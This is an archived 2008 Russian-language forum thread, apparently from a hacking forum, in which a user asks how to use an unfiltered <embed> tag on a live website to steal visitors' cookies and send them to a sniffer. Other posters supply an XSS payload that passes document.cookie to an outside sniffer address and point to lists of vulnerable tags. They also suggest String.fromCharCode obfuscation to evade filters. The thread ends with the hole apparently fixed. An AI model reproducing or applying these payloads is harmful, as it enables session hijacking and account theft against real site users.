PDA

Просмотр полной версии : использование тега embed для угона cookies ?


ickhz
14.12.2008, 00:51
Обнаружила, что на сайте на фильтруется тег <embed> и javascript в нем. ТО есть работает конструкция <embed src=javascript:alert('ok');this.avi>.. Подскажите, как прописать здесь скрипт, чтобы работала передача cookies на сниффер античата.

Pashkela
14.12.2008, 00:53
также, как и обычно

Велемир
14.12.2008, 01:06
Везде,где есть атрибут src,есть возможность эксплуатации XSS,не учитывая существования фильтров.

-m0rgan-
14.12.2008, 01:07
В XSS не особо,но по моему так:
<embed src=javascript:src='адрес снифера';this.avi>

Велемир
14.12.2008, 01:16
+document.cookie :D

-m0rgan-
14.12.2008, 01:19
Бля,точно,пропустил:(
спс за поправку!

Велемир
14.12.2008, 01:29
:):) Вообще,есть список *уязвимых* тегов касательно XSS.
http://www.inattack.ru/article/519.html к примеру,но был список и получше...

ickhz
15.12.2008, 18:06
А, поняла, там фигня какая-то хитрая по-моему, которая не дает забрать cookies..

alert(document.cookies) выдает вместо cookies undefined

Типа защита такая что-ли))))

freddi
15.12.2008, 19:31
ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.

iddqd
15.12.2008, 19:34
попробуй прогнать скрипт через StringFromCharCode
http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx

ickhz
16.12.2008, 15:15
ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.

Точно.. сорри! Теперь выводит пустой алерт.

ickhz
16.12.2008, 15:25
попробуй прогнать скрипт через StringFromCharCode
http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx

Спс

Велемир
21.12.2008, 02:50
Естессно ничего не выведет,ибо пофиксено.

ickhz
29.12.2008, 17:05
Да, к сожалению, именно так.. (